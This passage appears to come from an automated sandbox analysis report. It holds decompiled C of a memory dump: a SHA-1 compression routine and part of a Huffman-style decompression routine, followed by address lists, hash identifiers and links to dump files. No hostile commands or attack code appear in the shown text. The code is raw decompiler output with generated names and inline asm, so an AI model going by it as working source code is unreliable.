    				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
    				_t430 = _t839;
    				asm("ror ebp, 0x2");
    				_v16 = _t839;
    				_a8 =  &(_t839[3]);
    				do {
    					_t431 = E00855644(_t430[1]);
    					asm("rol edx, 0x5");
    					 *((intOrPtr*)(_v16 + 4)) = _t431;
    					asm("ror ebx, 0x2");
    					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
    					_t436 = E00855644( *((intOrPtr*)(_a8 - 4)));
    					asm("rol edx, 0x5");
    					 *((intOrPtr*)(_a8 - 4)) = _t436;
    					asm("ror esi, 0x2");
    					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
    					_t441 = E00855644( *_a8);
    					asm("rol edx, 0x5");
    					 *_a8 = _t441;
    					asm("ror dword [esp+0x48], 0x2");
    					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
    					_t443 = E00855644( *((intOrPtr*)(_a8 + 4)));
    					_a8 = _a8 + 0x14;
    					asm("rol edx, 0x5");
    					 *((intOrPtr*)(_a8 + 4)) = _t443;
    					_t446 = _v24 + 5;
    					asm("ror dword [esp+0x48], 0x2");
    					_v24 = _t446;
    					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
    					_v16 =  &(_t839[_t446]);
    					_t448 = E00855644(_t839[_t446]);
    					_t906 =  &(_t906[5]);
    					asm("rol edx, 0x5");
    					 *_v16 = _t448;
    					_t430 = _v16;
    					asm("ror ebp, 0x2");
    					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
    				} while (_v24 != 0xf);
    				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
    				asm("rol edx, 1");
    				asm("rol ecx, 0x5");
    				 *_t839 = _t769;
    				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
    				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
    				_a16 = _t454;
    				asm("rol edx, 1");
    				asm("rol ecx, 0x5");
    				asm("ror ebx, 0x2");
    				_t839[1] = _t773;
    				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
    				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
    				asm("ror esi, 0x2");
    				_a8 = _t460;
    				asm("rol edx, 1");
    				asm("rol ecx, 0x5");
    				_t839[2] = _t777;
    				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
    				_t887 = _a16;
    				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
    				_v28 = _t466;
    				asm("ror ebp, 0x2");
    				_a16 = _t887;
    				_t888 = _a8;
    				asm("rol edx, 1");
    				asm("rol ecx, 0x5");
    				_t839[3] = _t781;
    				asm("ror ebp, 0x2");
    				_t782 = 0x11;
    				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
    				_a8 = _t888;
    				_v16 = _t782;
    				do {
    					_t89 = _t782 + 5; // 0x16
    					_t474 = _t89;
    					_v8 = _t474;
    					_t91 = _t782 - 5; // 0xc
    					_t92 = _t782 + 3; // 0x14
    					_t890 = _t92 & 0x0000000f;
    					_t595 = _t474 & 0x0000000f;
    					_v12 = _t890;
    					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
    					asm("rol edx, 1");
    					_t839[_t890] = _t786;
    					_t891 = _v28;
    					asm("rol ecx, 0x5");
    					asm("ror ebp, 0x2");
    					_v28 = _t891;
    					_t482 = _v16;
    					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
    					_t854 = _v20;
    					_t787 = 0xf;
    					_t841 = _t482 + 0x00000006 & _t787;
    					_t893 = _t482 + 0x00000004 & _t787;
    					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
    					asm("rol edx, 1");
    					 *(_t854 + _t893 * 4) = _t791;
    					_t855 = _a12;
    					asm("rol ecx, 0x5");
    					asm("ror esi, 0x2");
    					_a12 = _t855;
    					_t489 = _v16;
    					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
    					_t857 = _t489 + 0x00000007 & 0x0000000f;
    					_t670 = _v20;
    					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
    					asm("rol edx, 1");
    					 *(_t670 + _t595 * 4) = _t796;
    					_t596 = _v24;
    					asm("rol ecx, 0x5");
    					asm("ror ebx, 0x2");
    					_v24 = _t596;
    					_t597 = _v20;
    					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
    					asm("rol ecx, 0x5");
    					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
    					asm("rol edx, 1");
    					 *(_t597 + _t841 * 4) = _t800;
    					_t598 = _a16;
    					_t839 = _v20;
    					asm("ror ebx, 0x2");
    					_a16 = _t598;
    					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
    					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
    					_t894 = _a8;
    					asm("rol edx, 1");
    					_t839[_t857] = _t804;
    					_t851 = _v24;
    					asm("rol ecx, 0x5");
    					_t782 = _v8;
    					asm("ror ebp, 0x2");
    					_a8 = _t894;
    					_a12 = _a12 + 0x6ed9eba1 + (_t851 ^ _t598 ^ _t894) + _v28 + _t804;
    					_v16 = _t782;
    				} while (_t782 + 3 <= 0x23);
    				_t858 = 0x25;
    				_v16 = _t858;
    				while(1) {
    					_t199 = _t858 + 5; // 0x2a
    					_t512 = _t199;
    					_t200 = _t858 - 5; // 0x20
    					_v4 = _t512;
    					_t202 = _t858 + 3; // 0x28
    					_t806 = _t202 & 0x0000000f;
    					_v8 = _t806;
    					_t896 = _t512 & 0x0000000f;
    					_t862 = _t839[_t200 & 0x0000000f] ^ _t839[_t858 & 0x0000000f] ^ _t839[_t806] ^ _t839[_t896];
    					asm("rol esi, 1");
    					_t599 = _v28;
    					_t839[_t806] = _t862;
    					asm("rol edx, 0x5");
    					asm("ror ebx, 0x2");
    					_t863 = 0xf;
    					_v28 = _t599;
    					_v24 = _a12 - 0x70e44324 + ((_a8 | _v28) & _t598 | _a8 & _t599) + _t862 + _v24;
    					_t519 = _v16;
    					_t601 = _t519 + 0x00000006 & _t863;
    					_t809 = _t519 + 0x00000004 & _t863;
    					_v12 = _t809;
    					_t867 = _t839[_t519 - 0x00000004 & _t863] ^ _t839[_t519 + 0x00000001 & _t863] ^ _t839[_t809] ^ _t839[_t601];
    					asm("rol esi, 1");
    					_t839[_t809] = _t867;
    					_t842 = _a12;
    					_t810 = _v24;
    					asm("rol edx, 0x5");
    					asm("ror edi, 0x2");
    					_a12 = _t842;
    					_t243 = _t810 - 0x70e44324; // -1894007573
    					_t811 = _v20;
    					_a16 = _t243 + ((_v28 | _t842) & _a8 | _v28 & _t842) + _t867 + _a16;
    					_t526 = _v16;
    					_t844 = _t526 + 0x00000007 & 0x0000000f;
    					_t871 =  *(_t811 + (_t526 - 0x00000003 & 0x0000000f) * 4) ^  *(_t811 + (_t526 + 0x00000002 & 0x0000000f) * 4) ^  *(_t811 + _t844 * 4) ^  *(_t811 + _t896 * 4);
    					asm("rol esi, 1");
    					 *(_t811 + _t896 * 4) = _t871;
    					_t897 = _v24;
    					asm("rol edx, 0x5");
    					asm("ror ebp, 0x2");
    					_t814 = _a16 + 0x8f1bbcdc + ((_t897 | _a12) & _v28 | _t897 & _a12) + _t871 + _a8;
    					_v24 = _t897;
    					_t898 = _v20;
    					_a8 = _t814;
    					asm("rol edx, 0x5");
    					_t875 =  *(_t898 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t898 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t898 + _v8 * 4) ^  *(_t898 + _t601 * 4);
    					asm("rol esi, 1");
    					 *(_t898 + _t601 * 4) = _t875;
    					_t598 = _a16;
    					asm("ror ebx, 0x2");
    					_a16 = _t598;
    					_t815 = _t814 + ((_v24 | _t598) & _a12 | _v24 & _t598) + 0x8f1bbcdc + _t875 + _v28;
    					_v28 = _t815;
    					asm("rol edx, 0x5");
    					_t879 =  *(_t898 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t898 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t898 + _t844 * 4) ^  *(_t898 + _v12 * 4);
    					asm("rol esi, 1");
    					 *(_t898 + _t844 * 4) = _t879;
    					_t899 = _a8;
    					_t845 = _v24;
    					asm("ror ebp, 0x2");
    					_a8 = _t899;
    					_t858 = _v4;
    					_a12 = _t815 - 0x70e44324 + ((_t598 | _t899) & _t845 | _t598 & _t899) + _t879 + _a12;
    					_v16 = _t858;
    					if(_t858 + 3 > 0x37) {
    						break;
    					}
    					_t839 = _v20;
    				}
    				_t816 = 0x39;
    				_v16 = _t816;
    				do {
    					_t310 = _t816 + 5; // 0x3e
    					_t546 = _t310;
    					_v8 = _t546;
    					_t312 = _t816 + 3; // 0x3c
    					_t313 = _t816 - 5; // 0x34
    					_t880 = 0xf;
    					_t901 = _t312 & _t880;
    					_t603 = _t546 & _t880;
    					_t881 = _v20;
    					_v4 = _t901;
    					_t820 =  *(_t881 + (_t313 & _t880) * 4) ^  *(_t881 + (_t816 & _t880) * 4) ^  *(_t881 + _t603 * 4) ^  *(_t881 + _t901 * 4);
    					asm("rol edx, 1");
    					 *(_t881 + _t901 * 4) = _t820;
    					_t902 = _v28;
    					asm("rol ecx, 0x5");
    					asm("ror ebp, 0x2");
    					_v28 = _t902;
    					_v24 = (_a16 ^ _a8 ^ _t902) + _t820 + _t845 + _a12 + 0xca62c1d6;
    					_t555 = _v16;
    					_t821 = 0xf;
    					_t847 = _t555 + 0x00000006 & _t821;
    					_t904 = _t555 + 0x00000004 & _t821;
    					_t825 =  *(_t881 + (_t555 - 0x00000004 & _t821) * 4) ^  *(_t881 + (_t555 + 0x00000001 & _t821) * 4) ^  *(_t881 + _t904 * 4) ^  *(_t881 + _t847 * 4);
    					asm("rol edx, 1");
    					 *(_t881 + _t904 * 4) = _t825;
    					_t882 = _a12;
    					asm("rol ecx, 0x5");
    					_a16 = (_a8 ^ _v28 ^ _t882) + _t825 + _a16 + _v24 + 0xca62c1d6;
    					_t564 = _v16;
    					asm("ror esi, 0x2");
    					_a12 = _t882;
    					_t884 = _t564 + 0x00000007 & 0x0000000f;
    					_t741 = _v20;
    					_t830 = _v20[_t564 - 0x00000003 & 0x0000000f] ^  *(_t741 + (_t564 + 0x00000002 & 0x0000000f) * 4) ^  *(_t741 + _t603 * 4) ^  *(_t741 + _t884 * 4);
    					asm("rol edx, 1");
    					 *(_t741 + _t603 * 4) = _t830;
    					_t604 = _v24;
    					asm("rol ecx, 0x5");
    					asm("ror ebx, 0x2");
    					_v24 = _t604;
    					_t605 = _v20;
    					_a8 = (_t604 ^ _v28 ^ _a12) + _t830 + _a8 + _a16 + 0xca62c1d6;
    					asm("rol ecx, 0x5");
    					_t834 = _t605[_v16 - 0x00000008 & 0x0000000f] ^ _t605[_v16 + 0xfffffffe & 0x0000000f] ^ _t605[_t847] ^ _t605[_v4];
    					asm("rol edx, 1");
    					_t605[_t847] = _t834;
    					_t845 = _v24;
    					asm("ror dword [esp+0x3c], 0x2");
    					_v28 = (_t845 ^ _a16 ^ _a12) + _t834 + _v28 + _a8 + 0xca62c1d6;
    					_t838 = _t605[_v16 - 0x00000007 & 0x0000000f] ^ _t605[_v16 - 0x00000001 & 0x0000000f] ^ _t605[_t904] ^ _t605[_t884];
    					_t905 = _a8;
    					asm("rol edx, 1");
    					_t605[_t884] = _t838;
    					_t606 = _a16;
    					_t885 = _v28;
    					asm("ror ebp, 0x2");
    					_t816 = _v8;
    					asm("rol ecx, 0x5");
    					_a8 = _t905;
    					_t752 = _t885 + 0xca62c1d6 + (_t845 ^ _t606 ^ _t905) + _t838 + _a12;
    					_v16 = _t816;
    					_a12 = _t752;
    				} while (_t816 + 3 <= 0x4b);
    				_t592 = _a4;
    				_t592[1] = _t592[1] + _t885;
    				_t592[2] = _t592[2] + _t905;
    				_t592[3] = _t592[3] + _t606;
    				 *_t592 =  *_t592 + _t752;
    				_t592[4] = _t592[4] + _t845;
    				return _t592;
    			}










































































































    0x0083e9a9
    0x0083e9b5
    0x0083e9c1
    0x0083e9cb
    0x0083e9d0
    0x0083e9d5
    0x0083e9b7
    0x0083e9b7
    0x0083e9bb
    0x0083e9bb
    0x0083e9d8
    0x0083e9e1
    0x0083e9e3
    0x0083e9e6
    0x0083e9f0
    0x0083e9f6
    0x0083e9fa
    0x0083ea12
    0x0083ea1d
    0x0083ea1f
    0x0083ea21
    0x0083ea26
    0x0083ea29
    0x0083ea2d
    0x0083ea31
    0x0083ea34
    0x0083ea3f
    0x0083ea44
    0x0083ea5e
    0x0083ea63
    0x0083ea6e
    0x0083ea7b
    0x0083ea80
    0x0083ea94
    0x0083ea9b
    0x0083eaa5
    0x0083eab2
    0x0083eabb
    0x0083eacb
    0x0083ead7
    0x0083ead9
    0x0083eae4
    0x0083eae9
    0x0083eaec
    0x0083eb00
    0x0083eb07
    0x0083eb0e
    0x0083eb17
    0x0083eb1b
    0x0083eb1f
    0x0083eb2a
    0x0083eb2d
    0x0083eb30
    0x0083eb3c
    0x0083eb4e
    0x0083eb51
    0x0083eb53
    0x0083eb69
    0x0083eb71
    0x0083eb75
    0x0083eb80
    0x0083eb92
    0x0083eb99
    0x0083eb9c
    0x0083eba2
    0x0083eba4
    0x0083eba9
    0x0083ebae
    0x0083ebc4
    0x0083ebcd
    0x0083ebcf
    0x0083ebd2
    0x0083ebd8
    0x0083ebde
    0x0083ebed
    0x0083ebfd
    0x0083ebff
    0x0083ec05
    0x0083ec07
    0x0083ec0d
    0x0083ec12
    0x0083ec16
    0x0083ec1c
    0x0083ec20
    0x0083ec2a
    0x0083ec31
    0x0083ec36
    0x0083ec37
    0x0083ec3b
    0x0083ec3f
    0x0083ec43
    0x0083ec43
    0x0083ec43
    0x0083ec48
    0x0083ec4c
    0x0083ec54
    0x0083ec5a
    0x0083ec5d
    0x0083ec60
    0x0083ec6f
    0x0083ec7e
    0x0083ec80
    0x0083ec83
    0x0083ec89
    0x0083ec93
    0x0083ec98
    0x0083ec9e
    0x0083eca2
    0x0083eca6
    0x0083ecaa
    0x0083ecae
    0x0083ecb3
    0x0083ecc6
    0x0083ecd5
    0x0083ecd7
    0x0083ecda
    0x0083ece0
    0x0083ece5
    0x0083ecf8
    0x0083ecfe
    0x0083ed02
    0x0083ed12
    0x0083ed1b
    0x0083ed25
    0x0083ed28
    0x0083ed2a
    0x0083ed31
    0x0083ed37
    0x0083ed46
    0x0083ed53
    0x0083ed59
    0x0083ed61
    0x0083ed82
    0x0083ed85
    0x0083ed8c
    0x0083ed90
    0x0083ed93
    0x0083ed9d
    0x0083edad
    0x0083edb2
    0x0083edba
    0x0083edd1
    0x0083edd8
    0x0083eddc
    0x0083edde
    0x0083ede1
    0x0083ede7
    0x0083edf0
    0x0083ee00
    0x0083ee05
    0x0083ee0c
    0x0083ee10
    0x0083ee14
    0x0083ee1f
    0x0083ee20
    0x0083ee2a
    0x0083ee2a
    0x0083ee2a
    0x0083ee2d
    0x0083ee30
    0x0083ee37
    0x0083ee3c
    0x0083ee41
    0x0083ee48
    0x0083ee56
    0x0083ee65
    0x0083ee67
    0x0083ee6d
    0x0083ee7c
    0x0083ee7f
    0x0083ee82
    0x0083ee83
    0x0083ee8f
    0x0083ee93
    0x0083ee9d
    0x0083ee9f
    0x0083eea6
    0x0083eeb6
    0x0083eebf
    0x0083eec1
    0x0083eec4
    0x0083eed0
    0x0083eed8
    0x0083eedf
    0x0083eee2
    0x0083eee6
    0x0083eeec
    0x0083eef2
    0x0083eef6
    0x0083ef06
    0x0083ef15
    0x0083ef18
    0x0083ef1a
    0x0083ef1d
    0x0083ef41
    0x0083ef4a
    0x0083ef4d
    0x0083ef4f
    0x0083ef53
    0x0083ef5d
    0x0083ef64
    0x0083ef7a
    0x0083ef84
    0x0083ef86
    0x0083ef8a
    0x0083ef98
    0x0083efa7
    0x0083efaf
    0x0083efb4
    0x0083efbb
    0x0083efd4
    0x0083efda
    0x0083efdc
    0x0083efe0
    0x0083efe6
    0x0083efee
    0x0083eff3
    0x0083f003
    0x0083f009
    0x0083f00d
    0x0083f017
    0x00000000
    0x00000000
    0x0083ee26
    0x0083ee26
    0x0083f01f
    0x0083f020
    0x0083f024
    0x0083f024
    0x0083f024
    0x0083f029
    0x0083f02d
    0x0083f032
    0x0083f037
    0x0083f03c
    0x0083f03e
    0x0083f040
    0x0083f044
    0x0083f053
    0x0083f062
    0x0083f064
    0x0083f067
    0x0083f06f
    0x0083f074
    0x0083f07d
    0x0083f083
    0x0083f087
    0x0083f08b
    0x0083f092
    0x0083f094
    0x0083f0a7
    0x0083f0b6
    0x0083f0b8
    0x0083f0bb
    0x0083f0c3
    0x0083f0d6
    0x0083f0da
    0x0083f0de
    0x0083f0e1
    0x0083f0f1
    0x0083f0fa
    0x0083f104
    0x0083f107
    0x0083f109
    0x0083f110
    0x0083f114
    0x0083f129
    0x0083f132
    0x0083f136
    0x0083f13a
    0x0083f15f
    0x0083f168
    0x0083f16b
    0x0083f16d
    0x0083f170
    0x0083f17e
    0x0083f18b
    0x0083f1a8
    0x0083f1ab
    0x0083f1af
    0x0083f1b1
    0x0083f1b4
    0x0083f1ba
    0x0083f1c2
    0x0083f1cb
    0x0083f1cf
    0x0083f1d8
    0x0083f1dc
    0x0083f1de
    0x0083f1e5
    0x0083f1e9
    0x0083f1f2
    0x0083f1f6
    0x0083f1f9
    0x0083f1fc
    0x0083f1ff
    0x0083f201
    0x0083f20b

    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
    • Instruction ID: 8ec654e22ff1ca7fe22ee78264803d19a5accb221862709752b0dda0d33caf0b
    • Opcode Fuzzy Hash: 4e7b0ccbe73f12176ec16f512a93a580537ef3023298fa6d6ddcdcaff0b82cb7
    • Instruction Fuzzy Hash: D8524AB26047019FC758CF18C891A6AF7E1FFC8304F49992DF9868B255D334E919CB86
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 88%
    			E00846715(signed int __ecx) {
    				void* __ebp;
    				signed int _t201;
    				signed int _t203;
    				signed int _t205;
    				signed int _t206;
    				signed int _t207;
    				signed int _t209;
    				signed int _t210;
    				signed int _t212;
    				signed int _t214;
    				signed int _t215;
    				signed int _t216;
    				signed int _t218;
    				signed int _t219;
    				signed int _t220;
    				signed int _t221;
    				unsigned int _t223;
    				signed int _t233;
    				signed int _t237;
    				signed int _t240;
    				signed int _t241;
    				signed int _t242;
    				signed int _t244;
    				signed int _t245;
    				signed short _t246;
    				signed int _t247;
    				signed int _t250;
    				signed int* _t251;
    				signed int _t253;
    				signed int _t254;
    				signed int _t255;
    				unsigned int _t256;
    				signed int _t259;
    				signed int _t260;
    				signed int _t261;
    				signed int _t263;
    				signed int _t264;
    				signed short _t265;
    				unsigned int _t269;
    				unsigned int _t274;
    				signed int _t279;
    				signed short _t280;
    				signed int _t284;
    				void* _t291;
    				signed int _t293;
    				signed int* _t295;
    				signed int _t296;
    				signed int _t297;
    				signed int _t301;
    				signed int _t304;
    				signed int _t305;
    				signed int _t308;
    				signed int _t309;
    				signed int _t310;
    				intOrPtr _t313;
    				intOrPtr _t314;
    				signed int _t315;
    				unsigned int _t318;
    				void* _t320;
    				signed int _t323;
    				signed int _t324;
    				unsigned int _t327;
    				void* _t329;
    				signed int _t332;
    				void* _t335;
    				signed int _t338;
    				signed int _t339;
    				intOrPtr* _t341;
    				void* _t342;
    				signed int _t345;
    				signed int* _t349;
    				signed int _t350;
    				unsigned int _t354;
    				void* _t356;
    				signed int _t359;
    				void* _t363;
    				signed int _t366;
    				signed int _t367;
    				unsigned int _t370;
    				void* _t372;
    				signed int _t375;
    				intOrPtr* _t377;
    				void* _t378;
    				signed int _t381;
    				void* _t384;
    				signed int _t388;
    				signed int _t389;
    				intOrPtr* _t391;
    				void* _t392;
    				signed int _t395;
    				void* _t398;
    				signed int _t401;
    				signed int _t402;
    				intOrPtr* _t404;
    				void* _t405;
    				signed int _t408;
    				signed int _t414;
    				unsigned int _t416;
    				unsigned int _t420;
    				signed int _t423;
    				signed int _t424;
    				unsigned int _t426;
    				unsigned int _t430;
    				signed int _t433;
    				signed int _t434;
    				void* _t435;
    				signed int _t436;
    				intOrPtr* _t438;
    				signed char _t440;
    				signed int _t442;
    				intOrPtr _t443;
    				signed int _t446;
    				signed int _t447;
    				signed int _t448;
    				void* _t455;
    
    				_t440 =  *(_t455 + 0x34);
    				 *(_t455 + 0x14) = __ecx;
    				if( *((char*)(_t440 + 0x2c)) != 0) {
    					L3:
    					_t313 =  *((intOrPtr*)(_t440 + 0x18));
    					_t438 = _t440 + 4;
    					__eflags =  *_t438 -  *((intOrPtr*)(_t440 + 0x24)) + _t313;
    					if( *_t438 <=  *((intOrPtr*)(_t440 + 0x24)) + _t313) {
    						 *(_t440 + 0x4ad8) =  *(_t440 + 0x4ad8) & 0x00000000;
    						_t201 =  *((intOrPtr*)(_t440 + 0x20)) - 1 + _t313;
    						_t414 =  *((intOrPtr*)(_t440 + 0x4acc)) - 0x10;
    						 *(_t455 + 0x14) = _t201;
    						 *(_t455 + 0x10) = _t414;
    						_t293 = _t201;
    						__eflags = _t201 - _t414;
    						if(_t201 >= _t414) {
    							_t293 = _t414;
    						}
    						 *(_t455 + 0x3c) = _t293;
    						while(1) {
    							_t314 =  *_t438;
    							__eflags = _t314 - _t293;
    							if(_t314 < _t293) {
    								goto L15;
    							}
    							L9:
    							__eflags = _t314 - _t201;
    							if(__eflags > 0) {
    								L93:
    								L94:
    								return _t201;
    							}
    							if(__eflags != 0) {
    								L12:
    								__eflags = _t314 - _t414;
    								if(_t314 < _t414) {
    									L14:
    									__eflags = _t314 -  *((intOrPtr*)(_t440 + 0x4acc));
    									if(_t314 >=  *((intOrPtr*)(_t440 + 0x4acc))) {
    										L92:
    										 *((char*)(_t440 + 0x4ad3)) = 1;
    										goto L93;
    									}
    									goto L15;
    								}
    								__eflags =  *((char*)(_t440 + 0x4ad2));
    								if( *((char*)(_t440 + 0x4ad2)) == 0) {
    									goto L92;
    								}
    								goto L14;
    							}
    							_t201 =  *(_t440 + 8);
    							__eflags = _t201 -  *((intOrPtr*)(_t440 + 0x1c));
    							if(_t201 >=  *((intOrPtr*)(_t440 + 0x1c))) {
    								goto L93;
    							}
    							goto L12;
    							L15:
    							_t315 =  *(_t440 + 0x4adc);
    							__eflags =  *(_t440 + 0x4ad8) - _t315 - 8;
    							if( *(_t440 + 0x4ad8) > _t315 - 8) {
    								_t284 = _t315 + _t315;
    								 *(_t440 + 0x4adc) = _t284;
    								_push(_t284 * 0xc);
    								_push( *(_t440 + 0x4ad4));
    								_t310 = E00852BBE(_t315, _t414);
    								__eflags = _t310;
    								if(_t310 == 0) {
    									E00836E54(0x8700e0);
    								}
    								 *(_t440 + 0x4ad4) = _t310;
    							}
    							_t203 =  *(_t440 + 0x4ad8);
    							_t295 = _t203 * 0xc +  *(_t440 + 0x4ad4);
    							 *(_t455 + 0x24) = _t295;
    							 *(_t440 + 0x4ad8) = _t203 + 1;
    							_t205 = E0083A591(_t438);
    							_t206 =  *(_t440 + 0xb4);
    							_t416 = _t205 & 0x0000fffe;
    							__eflags = _t416 -  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4));
    							if(_t416 >=  *((intOrPtr*)(_t440 + 0x34 + _t206 * 4))) {
    								_t442 = 0xf;
    								_t207 = _t206 + 1;
    								__eflags = _t207 - _t442;
    								if(_t207 >= _t442) {
    									L27:
    									_t318 =  *(_t438 + 4) + _t442;
    									 *(_t438 + 4) = _t318 & 0x00000007;
    									_t209 = _t318 >> 3;
    									 *_t438 =  *_t438 + _t209;
    									_t320 = 0x10;
    									_t443 =  *((intOrPtr*)(_t455 + 0x1c));
    									_t323 =  *((intOrPtr*)(_t440 + 0x74 + _t442 * 4)) + (_t416 -  *((intOrPtr*)(_t440 + 0x30 + _t442 * 4)) >> _t320 - _t442);
    									__eflags = _t323 -  *((intOrPtr*)(_t440 + 0x30));
    									asm("sbb eax, eax");
    									_t210 = _t209 & _t323;
    									__eflags = _t210;
    									_t324 =  *(_t440 + 0xcb8 + _t210 * 2) & 0x0000ffff;
    									goto L28;
    								}
    								_t404 = _t440 + 0x34 + _t207 * 4;
    								while(1) {
    									__eflags = _t416 -  *_t404;
    									if(_t416 <  *_t404) {
    										break;
    									}
    									_t207 = _t207 + 1;
    									_t404 = _t404 + 4;
    									__eflags = _t207 - 0xf;
    									if(_t207 < 0xf) {
    										continue;
    									}
    									goto L27;
    								}
    								_t442 = _t207;
    								goto L27;
    							} else {
    								_t405 = 0x10;
    								_t436 = _t416 >> _t405 - _t206;
    								_t408 = ( *(_t436 + _t440 + 0xb8) & 0x000000ff) +  *(_t438 + 4);
    								 *_t438 =  *_t438 + (_t408 >> 3);
    								 *(_t438 + 4) = _t408 & 0x00000007;
    								_t324 =  *(_t440 + 0x4b8 + _t436 * 2) & 0x0000ffff;
    								L28:
    								__eflags = _t324 - 0x100;
    								if(_t324 >= 0x100) {
    									__eflags = _t324 - 0x106;
    									if(_t324 < 0x106) {
    										__eflags = _t324 - 0x100;
    										if(_t324 != 0x100) {
    											__eflags = _t324 - 0x101;
    											if(_t324 != 0x101) {
    												_t212 = 3;
    												 *_t295 = _t212;
    												_t295[2] = _t324 - 0x102;
    												_t214 = E0083A591(_t438);
    												_t215 =  *(_t440 + 0x2d78);
    												_t420 = _t214 & 0x0000fffe;
    												__eflags = _t420 -  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4));
    												if(_t420 >=  *((intOrPtr*)(_t440 + 0x2cf8 + _t215 * 4))) {
    													_t296 = 0xf;
    													_t216 = _t215 + 1;
    													__eflags = _t216 - _t296;
    													if(_t216 >= _t296) {
    														L85:
    														_t327 =  *(_t438 + 4) + _t296;
    														 *(_t438 + 4) = _t327 & 0x00000007;
    														_t218 = _t327 >> 3;
    														 *_t438 =  *_t438 + _t218;
    														_t329 = 0x10;
    														_t332 =  *((intOrPtr*)(_t440 + 0x2d38 + _t296 * 4)) + (_t420 -  *((intOrPtr*)(_t440 + 0x2cf4 + _t296 * 4)) >> _t329 - _t296);
    														__eflags = _t332 -  *((intOrPtr*)(_t440 + 0x2cf4));
    														asm("sbb eax, eax");
    														_t219 = _t218 & _t332;
    														__eflags = _t219;
    														_t220 =  *(_t440 + 0x397c + _t219 * 2) & 0x0000ffff;
    														L86:
    														_t297 = _t220 & 0x0000ffff;
    														__eflags = _t297 - 8;
    														if(_t297 >= 8) {
    															_t221 = 3;
    															_t446 = (_t297 >> 2) - 1;
    															_t301 = ((_t297 & _t221 | 0x00000004) << _t446) + 2;
    															__eflags = _t446;
    															if(_t446 != 0) {
    																_t223 = E0083A591(_t438);
    																_t335 = 0x10;
    																_t301 = _t301 + (_t223 >> _t335 - _t446);
    																_t338 =  *(_t438 + 4) + _t446;
    																 *_t438 =  *_t438 + (_t338 >> 3);
    																_t339 = _t338 & 0x00000007;
    																__eflags = _t339;
    																 *(_t438 + 4) = _t339;
    															}
    														} else {
    															_t301 = _t297 + 2;
    														}
    														( *(_t455 + 0x24))[1] = _t301;
    														L91:
    														_t414 =  *(_t455 + 0x14);
    														_t201 =  *(_t455 + 0x18);
    														_t293 =  *(_t455 + 0x3c);
    														_t443 =  *((intOrPtr*)(_t455 + 0x1c));
    														while(1) {
    															_t314 =  *_t438;
    															__eflags = _t314 - _t293;
    															if(_t314 < _t293) {
    																goto L15;
    															}
    															goto L9;
    														}
    													}
    													_t341 = _t440 + 0x2cf8 + _t216 * 4;
    													while(1) {
    														__eflags = _t420 -  *_t341;
    														if(_t420 <  *_t341) {
    															break;
    														}
    														_t216 = _t216 + 1;
    														_t341 = _t341 + 4;
    														__eflags = _t216 - 0xf;
